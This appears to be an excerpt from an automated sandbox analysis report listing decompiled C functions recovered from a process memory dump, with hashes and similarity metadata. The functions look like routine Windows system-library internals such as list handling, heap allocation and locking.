                                        • Instruction ID: c51f2b1cb4c14e0b841b608da25a6d5c70bf27bb25c1f45bb5e58d4f5a8bdcbf
                                        • Opcode Fuzzy Hash: 1f613fb90a71c9ad943e0c3093f18e64bf3d1a9e5b4c04e96195fa88bf2d2549
                                        • Instruction Fuzzy Hash: 8D21B072250600DFC725EF68CA45FA9B7FAFF08B04F544A6CE1498BAA1DB74E941DB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E05424257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr* _t27;
                                        				intOrPtr* _t30;
                                        				intOrPtr* _t31;
                                        				intOrPtr _t33;
                                        				intOrPtr* _t34;
                                        				intOrPtr* _t35;
                                        				void* _t37;
                                        				void* _t38;
                                        				void* _t39;
                                        				void* _t43;
                                        
                                        				_t39 = __eflags;
                                        				_t35 = __edi;
                                        				_push(8);
                                        				_push(0x54708d0);
                                        				E053ED08C(__ebx, __edi, __esi);
                                        				_t37 = __ecx;
                                        				E054241E8(__ebx, __edi, __ecx, _t39);
                                        				E053AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                        				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                        				_t18 = _t37 + 8;
                                        				_t33 =  *_t18;
                                        				_t27 =  *((intOrPtr*)(_t18 + 4));
                                        				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                        					L8:
                                        					_push(3);
                                        					asm("int 0x29");
                                        				} else {
                                        					 *_t27 = _t33;
                                        					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                        					_t35 = 0x54887e4;
                                        					_t18 =  *0x54887e0; // 0x0
                                        					while(_t18 != 0) {
                                        						_t43 = _t18 -  *0x5485cd0; // 0xffffffff
                                        						if(_t43 >= 0) {
                                        							_t31 =  *0x54887e4; // 0x0
                                        							_t18 =  *_t31;
                                        							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                        								goto L8;
                                        							} else {
                                        								 *0x54887e4 = _t18;
                                        								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                        								L05397055(_t31 + 0xfffffff8);
                                        								_t24 =  *0x54887e0; // 0x0
                                        								_t18 = _t24 - 1;
                                        								 *0x54887e0 = _t18;
                                        								continue;
                                        							}
                                        						}
                                        						goto L9;
                                        					}
                                        				}
                                        				L9:
                                        				__eflags =  *0x5485cd0;
                                        				if( *0x5485cd0 <= 0) {
                                        					L05397055(_t37);
                                        				} else {
                                        					_t30 = _t37 + 8;
                                        					_t34 =  *0x54887e8; // 0x0
                                        					__eflags =  *_t34 - _t35;
                                        					if( *_t34 != _t35) {
                                        						goto L8;
                                        					} else {
                                        						 *_t30 = _t35;
                                        						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                        						 *_t34 = _t30;
                                        						 *0x54887e8 = _t30;
                                        						 *0x54887e0 = _t18 + 1;
                                        					}
                                        				}
                                        				 *(_t38 - 4) = 0xfffffffe;
                                        				return E053ED0D1(L05424320());
                                        			}
















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a2cb8070d6416380177c836aedce6ae3c98f989b1e22aaf57497bd77a3c90bb
                                        • Instruction ID: 269c2e2d8d51dd0e7e5574252f2ddbac7af321d5178ad3757e4a0e4a8f7cb3d6
                                        • Opcode Fuzzy Hash: 7a2cb8070d6416380177c836aedce6ae3c98f989b1e22aaf57497bd77a3c90bb
                                        • Instruction Fuzzy Hash: C8217970A11A20CFCB19DF25D404AE9BBF2FB45794BA086AFD105DB390DB319441CF10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E054146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                        				signed short* _v8;
                                        				unsigned int _v12;
                                        				intOrPtr _v16;
                                        				signed int _t22;
                                        				signed char _t23;
                                        				short _t32;
                                        				void* _t38;
                                        				char* _t40;
                                        
                                        				_v12 = __edx;
                                        				_t29 = 0;
                                        				_v8 = __ecx;
                                        				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                        				_t38 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                        				if(_t38 != 0) {
                                        					_t40 = _a4;
                                        					 *_t40 = 1;
                                        					E053DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                        					_t22 = _v12 >> 1;
                                        					_t32 = 0x2e;
                                        					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                        					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                        					_t23 = E053CD268(_t38, 1);
                                        					asm("sbb al, al");
                                        					 *_t40 =  ~_t23 + 1;
                                        					L053B77F0(_v16, 0, _t38);
                                        				} else {
                                        					 *_a4 = 0;
                                        					_t29 = 0xc0000017;
                                        				}
                                        				return _t29;
                                        			}












                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                        • Instruction ID: 81e87e7a42cfff8f0cc662f90bbd4c91a3c4f43a4a43bb0d32c60aa1a4b37dff
                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                        • Instruction Fuzzy Hash: B611C272A04208BBCB059F5CD8809BEBBB9EF95304F1080AAF944CB351DA358D55D7A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 42%
                                        			E0539C962(char __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t19;
                                        				char _t22;
                                        				intOrPtr _t26;
                                        				intOrPtr _t27;
                                        				char _t32;
                                        				char _t34;
                                        				intOrPtr _t35;
                                        				intOrPtr _t37;
                                        				intOrPtr* _t38;
                                        				signed int _t39;
                                        
                                        				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                        				_v8 =  *0x548d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                        				_t34 = __ecx;
                                        				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                        					_t26 = 0;
                                        					E053AEEF0(0x54870a0);
                                        					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                        					if(E0541F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                        						L9:
                                        						E053AEB70(_t29, 0x54870a0);
                                        						_t19 = _t26;
                                        						L2:
                                        						_pop(_t35);
                                        						_pop(_t37);
                                        						_pop(_t27);
                                        						return E053DB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                        					}
                                        					_t29 = _t34;
                                        					_t26 = E0541F1FC(_t34, _t32);
                                        					if(_t26 < 0) {
                                        						goto L9;
                                        					}
                                        					_t38 =  *0x54870c0; // 0x0
                                        					while(_t38 != 0x54870c0) {
                                        						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                        						_t38 =  *_t38;
                                        						_v12 = _t22;
                                        						if(_t22 != 0) {
                                        							_t29 = _t22;
                                        							 *0x548b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                        							_v12();
                                        						}
                                        					}
                                        					goto L9;
                                        				}
                                        				_t19 = 0;
                                        				goto L2;
                                        			}



















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0453bb618d0d18b586568c10d11b4da53f25f1b9ebbb4600e9326cc7872cba23
                                        • Instruction ID: f6d70fd7c9c33bee0ce1e27796f0075797edc326dca63f876d1c3689d0b708db
                                        • Opcode Fuzzy Hash: 0453bb618d0d18b586568c10d11b4da53f25f1b9ebbb4600e9326cc7872cba23
                                        • Instruction Fuzzy Hash: 1611E0323186069BC714AE28DC599AFBBF6FB85620B20113AF84283691DF31BC14D7D2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E053D37F5(void* __ecx, intOrPtr* __edx) {
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed char _t6;
                                        				intOrPtr _t13;
                                        				intOrPtr* _t20;
                                        				intOrPtr* _t27;
                                        				void* _t28;
                                        				intOrPtr* _t29;
                                        
                                        				_t27 = __edx;
                                        				_t28 = __ecx;
                                        				if(__edx == 0) {
                                        					E053B2280(_t6, 0x5488550);
                                        				}
                                        				_t29 = E053D387E(_t28);
                                        				if(_t29 == 0) {
                                        					L6:
                                        					if(_t27 == 0) {
                                        						E053AFFB0(0x5488550, _t27, 0x5488550);
                                        					}
                                        					if(_t29 == 0) {
                                        						return 0xc0000225;
                                        					} else {
                                        						if(_t27 != 0) {
                                        							goto L14;
                                        						}
                                        						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                        						goto L11;
                                        					}
                                        				} else {
                                        					_t13 =  *_t29;
                                        					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                        						L13:
                                        						_push(3);
                                        						asm("int 0x29");
                                        						L14:
                                        						 *_t27 = _t29;
                                        						L11:
                                        						return 0;
                                        					}
                                        					_t20 =  *((intOrPtr*)(_t29 + 4));
                                        					if( *_t20 != _t29) {
                                        						goto L13;
                                        					}
                                        					 *_t20 = _t13;
                                        					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                        					asm("btr eax, ecx");
                                        					goto L6;
                                        				}
                                        			}












                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 598422d363e671814c4f6c3d1c2e509078a9aebaee5526fa4900a8a0194a9d54
                                        • Instruction ID: 0721d18654536b9a2a8aa72bf7c23b1390a5395bef9780d2d1587c0dff86115a
                                        • Opcode Fuzzy Hash: 598422d363e671814c4f6c3d1c2e509078a9aebaee5526fa4900a8a0194a9d54
                                        • Instruction Fuzzy Hash: 990126B3A416209BC3378B19A940E3AFBB7EF81A60719486DE9058B600CB70CC05C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E053A766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                        				char _v8;
                                        				void* _t22;
                                        				void* _t24;
                                        				intOrPtr _t29;
                                        				intOrPtr* _t30;
                                        				void* _t42;
                                        				intOrPtr _t47;
                                        
                                        				_push(__ecx);
                                        				_t36 =  &_v8;
                                        				if(E053CF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                        					L10:
                                        					_t22 = 0;
                                        				} else {
                                        					_t24 = _v8 + __ecx;
                                        					_t42 = _t24;
                                        					if(_t24 < __ecx) {
                                        						goto L10;
                                        					} else {
                                        						if(E053CF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                        							goto L10;
                                        						} else {
                                        							_t29 = _v8 + _t42;
                                        							if(_t29 < _t42) {
                                        								goto L10;
                                        							} else {
                                        								_t47 = _t29;
                                        								_t30 = _a16;
                                        								if(_t30 != 0) {
                                        									 *_t30 = _t47;
                                        								}
                                        								if(_t47 == 0) {
                                        									goto L10;
                                        								} else {
                                        									_t22 = L053B4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t22;
                                        			}











                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                        • Instruction ID: ad5cf99f85fb4d9e326fc9d94f1a50b3222b9b87c48f4b149e21cd34c801a266
                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                        • Instruction Fuzzy Hash: 0B018433710519BBC721DE5ECC85F5B77AEEBC4660B240664B909DB265DA70DD0187A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E0542C450(intOrPtr* _a4) {
                                        				signed char _t25;
                                        				intOrPtr* _t26;
                                        				intOrPtr* _t27;
                                        
                                        				_t26 = _a4;
                                        				_t25 =  *(_t26 + 0x10);
                                        				if((_t25 & 0x00000003) != 1) {
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push( *((intOrPtr*)(_t26 + 8)));
                                        					_push(0);
                                        					_push( *_t26);
                                        					E053D9910();
                                        					_t25 =  *(_t26 + 0x10);
                                        				}
                                        				if((_t25 & 0x00000001) != 0) {
                                        					_push(4);
                                        					_t7 = _t26 + 4; // 0x4
                                        					_t27 = _t7;
                                        					_push(_t27);
                                        					_push(5);
                                        					_push(0xfffffffe);
                                        					E053D95B0();
                                        					if( *_t27 != 0) {
                                        						_push( *_t27);
                                        						E053D95D0();
                                        					}
                                        				}
                                        				_t8 = _t26 + 0x14; // 0x14
                                        				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                        				}
                                        				_push( *_t26);
                                        				E053D95D0();
                                        				return L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                        			}







                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                        • Instruction ID: 62aa1571134d0e3d4e120e24760aa8f45948b63164b43232cfbb05122bdd226a
                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                        • Instruction Fuzzy Hash: 66018C72280515BFE621AF65CC84EA7F77EFF94390F404526F21486660CB22ACA1DAA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E05399080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                        				intOrPtr* _t51;
                                        				intOrPtr _t59;
                                        				signed int _t64;
                                        				signed int _t67;
                                        				signed int* _t71;
                                        				signed int _t74;
                                        				signed int _t77;
                                        				signed int _t82;
                                        				intOrPtr* _t84;
                                        				void* _t85;
                                        				intOrPtr* _t87;
                                        				void* _t94;
                                        				signed int _t95;
                                        				intOrPtr* _t97;
                                        				signed int _t99;
                                        				signed int _t102;
                                        				void* _t104;
                                        
                                        				_push(__ebx);
                                        				_push(__esi);
                                        				_push(__edi);
                                        				_t97 = __ecx;
                                        				_t102 =  *(__ecx + 0x14);
                                        				if((_t102 & 0x02ffffff) == 0x2000000) {
                                        					_t102 = _t102 | 0x000007d0;
                                        				}
                                        				_t48 =  *[fs:0x30];
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                        					_t102 = _t102 & 0xff000000;
                                        				}
                                        				_t80 = 0x54885ec;
                                        				E053B2280(_t48, 0x54885ec);
                                        				_t51 =  *_t97 + 8;
                                        				if( *_t51 != 0) {
                                        					L6:
                                        					return E053AFFB0(_t80, _t97, _t80);
                                        				} else {
                                        					 *(_t97 + 0x14) = _t102;
                                        					_t84 =  *0x548538c; // 0x77f06888
                                        					if( *_t84 != 0x5485388) {
                                        						_t85 = 3;
                                        						asm("int 0x29");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						_push(0x2c);
                                        						_push(0x546f6e8);
                                        						E053ED0E8(0x54885ec, _t97, _t102);
                                        						 *((char*)(_t104 - 0x1d)) = 0;
                                        						_t99 =  *(_t104 + 8);
                                        						__eflags = _t99;
                                        						if(_t99 == 0) {
                                        							L13:
                                        							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                        							if(__eflags == 0) {
                                        								E054688F5(_t80, _t85, 0x5485388, _t99, _t102, __eflags);
                                        							}
                                        						} else {
                                        							__eflags = _t99 -  *0x54886c0; // 0x32f07b0
                                        							if(__eflags == 0) {
                                        								goto L13;
                                        							} else {
                                        								__eflags = _t99 -  *0x54886b8; // 0x0
                                        								if(__eflags == 0) {
                                        									goto L13;
                                        								} else {
                                        									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                        									__eflags =  *((char*)(_t59 + 0x28));
                                        									if( *((char*)(_t59 + 0x28)) == 0) {
                                        										E053B2280(_t99 + 0xe0, _t99 + 0xe0);
                                        										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                        										__eflags =  *((char*)(_t99 + 0xe5));
                                        										if(__eflags != 0) {
                                        											E054688F5(0x54885ec, _t85, 0x5485388, _t99, _t102, __eflags);
                                        										} else {
                                        											__eflags =  *((char*)(_t99 + 0xe4));
                                        											if( *((char*)(_t99 + 0xe4)) == 0) {
                                        												 *((char*)(_t99 + 0xe4)) = 1;
                                        												_push(_t99);
                                        												_push( *((intOrPtr*)(_t99 + 0x24)));
                                        												E053DAFD0();
                                        											}
                                        											while(1) {
                                        												_t71 = _t99 + 8;
                                        												 *(_t104 - 0x2c) = _t71;
                                        												_t80 =  *_t71;
                                        												_t95 = _t71[1];
                                        												 *(_t104 - 0x28) = _t80;
                                        												 *(_t104 - 0x24) = _t95;
                                        												while(1) {
                                        													L19:
                                        													__eflags = _t95;
                                        													if(_t95 == 0) {
                                        														break;
                                        													}
                                        													_t102 = _t80;
                                        													 *(_t104 - 0x30) = _t95;
                                        													 *(_t104 - 0x24) = _t95 - 1;
                                        													asm("lock cmpxchg8b [edi]");
                                        													_t80 = _t102;
                                        													 *(_t104 - 0x28) = _t80;
                                        													 *(_t104 - 0x24) = _t95;
                                        													__eflags = _t80 - _t102;
                                        													_t99 =  *(_t104 + 8);
                                        													if(_t80 != _t102) {
                                        														continue;
                                        													} else {
                                        														__eflags = _t95 -  *(_t104 - 0x30);
                                        														if(_t95 !=  *(_t104 - 0x30)) {
                                        															continue;
                                        														} else {
                                        															__eflags = _t95;
                                        															if(_t95 != 0) {
                                        																_t74 = 0;
                                        																 *(_t104 - 0x34) = 0;
                                        																_t102 = 0;
                                        																__eflags = 0;
                                        																while(1) {
                                        																	 *(_t104 - 0x3c) = _t102;
                                        																	__eflags = _t102 - 3;
                                        																	if(_t102 >= 3) {
                                        																		break;
                                        																	}
                                        																	__eflags = _t74;
                                        																	if(_t74 != 0) {
                                        																		L49:
                                        																		_t102 =  *_t74;
                                        																		__eflags = _t102;
                                        																		if(_t102 != 0) {
                                        																			_t102 =  *(_t102 + 4);
                                        																			__eflags = _t102;
                                        																			if(_t102 != 0) {
                                        																				 *0x548b1e0(_t74, _t99);
                                        																				 *_t102();
                                        																			}
                                        																		}
                                        																		do {
                                        																			_t71 = _t99 + 8;
                                        																			 *(_t104 - 0x2c) = _t71;
                                        																			_t80 =  *_t71;
                                        																			_t95 = _t71[1];
                                        																			 *(_t104 - 0x28) = _t80;
                                        																			 *(_t104 - 0x24) = _t95;
                                        																			goto L19;
                                        																		} while (_t74 == 0);
                                        																		goto L49;
                                        																	} else {
                                        																		_t82 = 0;
                                        																		__eflags = 0;
                                        																		while(1) {
                                        																			 *(_t104 - 0x38) = _t82;
                                        																			__eflags = _t82 -  *0x54884c0;
                                        																			if(_t82 >=  *0x54884c0) {
                                        																				break;
                                        																			}
                                        																			__eflags = _t74;
                                        																			if(_t74 == 0) {
                                        																				_t77 = E05469063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                        																				__eflags = _t77;
                                        																				if(_t77 == 0) {
                                        																					_t74 = 0;
                                        																					__eflags = 0;
                                        																				} else {
                                        																					_t74 = _t77 + 0xfffffff4;
                                        																				}
                                        																				 *(_t104 - 0x34) = _t74;
                                        																				_t82 = _t82 + 1;
                                        																				continue;
                                        																			}
                                        																			break;
                                        																		}
                                        																		_t102 = _t102 + 1;
                                        																		continue;
                                        																	}
                                        																	goto L20;
                                        																}
                                        																__eflags = _t74;
                                        															}
                                        														}
                                        													}
                                        													break;
                                        												}
                                        												L20:
                                        												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                        												 *((char*)(_t99 + 0xe5)) = 1;
                                        												 *((char*)(_t104 - 0x1d)) = 1;
                                        												goto L21;
                                        											}
                                        										}
                                        										L21:
                                        										 *(_t104 - 4) = 0xfffffffe;
                                        										E0539922A(_t99);
                                        										_t64 = E053B7D50();
                                        										__eflags = _t64;
                                        										if(_t64 != 0) {
                                        											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        										} else {
                                        											_t67 = 0x7ffe0386;
                                        										}
                                        										__eflags =  *_t67;
                                        										if( *_t67 != 0) {
                                        											_t67 = E05468B58(_t99);
                                        										}
                                        										__eflags =  *((char*)(_t104 - 0x1d));
                                        										if( *((char*)(_t104 - 0x1d)) != 0) {
                                        											__eflags = _t99 -  *0x54886c0; // 0x32f07b0
                                        											if(__eflags != 0) {
                                        												__eflags = _t99 -  *0x54886b8; // 0x0
                                        												if(__eflags == 0) {
                                        													_t94 = 0x54886bc;
                                        													_t87 = 0x54886b8;
                                        													goto L27;
                                        												} else {
                                        													__eflags = _t67 | 0xffffffff;
                                        													asm("lock xadd [edi], eax");
                                        													if(__eflags == 0) {
                                        														E05399240(_t80, _t99, _t99, _t102, __eflags);
                                        													}
                                        												}
                                        											} else {
                                        												_t94 = 0x54886c4;
                                        												_t87 = 0x54886c0;
                                        												L27:
                                        												E053C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                        											}
                                        										}
                                        									} else {
                                        										goto L13;
                                        									}
                                        								}
                                        							}
                                        						}
                                        						return E053ED130(_t80, _t99, _t102);
                                        					} else {
                                        						 *_t51 = 0x5485388;
                                        						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                        						 *_t84 = _t51;
                                        						 *0x548538c = _t51;
                                        						goto L6;
                                        					}
                                        				}
                                        			}




















                                        0x00000000
                                        0x05399205
                                        0x05399205
                                        0x05399208
                                        0x0539920c
                                        0x05399214
                                        0x05399214
                                        0x0539920c
                                        0x053991e9
                                        0x053991e9
                                        0x053991ee
                                        0x053991f3
                                        0x053991f3
                                        0x053991f3
                                        0x053991e7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x05399134
                                        0x05399125
                                        0x0539911d
                                        0x0539914e
                                        0x053990d1
                                        0x053990d1
                                        0x053990d3
                                        0x053990d6
                                        0x053990d8
                                        0x00000000
                                        0x053990d8
                                        0x053990cf

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea68da27b063c3355f39c5a4b6105e5d94bdfa37c84e4f7876795b2a0a6b34de
                                        • Instruction ID: 711a0d6b490a9a77e461d6692e640ac32063861da8b83724462d547c5ae2381e
                                        • Opcode Fuzzy Hash: ea68da27b063c3355f39c5a4b6105e5d94bdfa37c84e4f7876795b2a0a6b34de
                                        • Instruction Fuzzy Hash: E90181B36116049FD7199F14D844B667BBAFB45320F25406AF5158B791C7B4DC41CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E05464015(signed int __eax, signed int __ecx) {
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed char _t10;
                                        				signed int _t28;
                                        
                                        				_push(__ecx);
                                        				_t28 = __ecx;
                                        				asm("lock xadd [edi+0x24], eax");
                                        				_t10 = (__eax | 0xffffffff) - 1;
                                        				if(_t10 == 0) {
                                        					_t1 = _t28 + 0x1c; // 0x1e
                                        					E053B2280(_t10, _t1);
                                        					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                        					E053B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x54886ac);
                                        					E0539F900(0x54886d4, _t28);
                                        					E053AFFB0(0x54886ac, _t28, 0x54886ac);
                                        					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                        					E053AFFB0(0, _t28, _t1);
                                        					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                        					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                        						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                        					}
                                        					_t10 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                        				}
                                        				return _t10;
                                        			}








                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e620dee0753a6fc04d7e7b104154ab4a3ac6d77d8328c5561f12b75a54fd341f
                                        • Instruction ID: b695f1516dc426d857acc441e3426e65101b0731fb387355acbeac036cff0a15
                                        • Opcode Fuzzy Hash: e620dee0753a6fc04d7e7b104154ab4a3ac6d77d8328c5561f12b75a54fd341f
                                        • Instruction Fuzzy Hash: 07018F723419857FDB55AB69CD88EA7B7ACFF85660B000226B608CBA11DB64EC11C6E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 61%
                                        			E054514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				short _v54;
                                        				char _v60;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t21;
                                        				intOrPtr _t27;
                                        				intOrPtr _t33;
                                        				intOrPtr _t34;
                                        				signed int _t35;
                                        
                                        				_t32 = __edx;
                                        				_t27 = __ebx;
                                        				_v8 =  *0x548d360 ^ _t35;
                                        				_t33 = __edx;
                                        				_t34 = __ecx;
                                        				E053DFA60( &_v60, 0, 0x30);
                                        				_v20 = _a4;
                                        				_v16 = _a8;
                                        				_v28 = _t34;
                                        				_v24 = _t33;
                                        				_v54 = 0x1034;
                                        				if(E053B7D50() == 0) {
                                        					_t21 = 0x7ffe0388;
                                        				} else {
                                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				_push( &_v60);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t21 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                        			}


















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ec6ea0ca289a404bd9931214c349206696c1535d8c97922840855ea60968d64
                                        • Instruction ID: 0d2c0d0974c052878d7e691f66d3959c018b59d645cdc8fc01526be264bcccc5
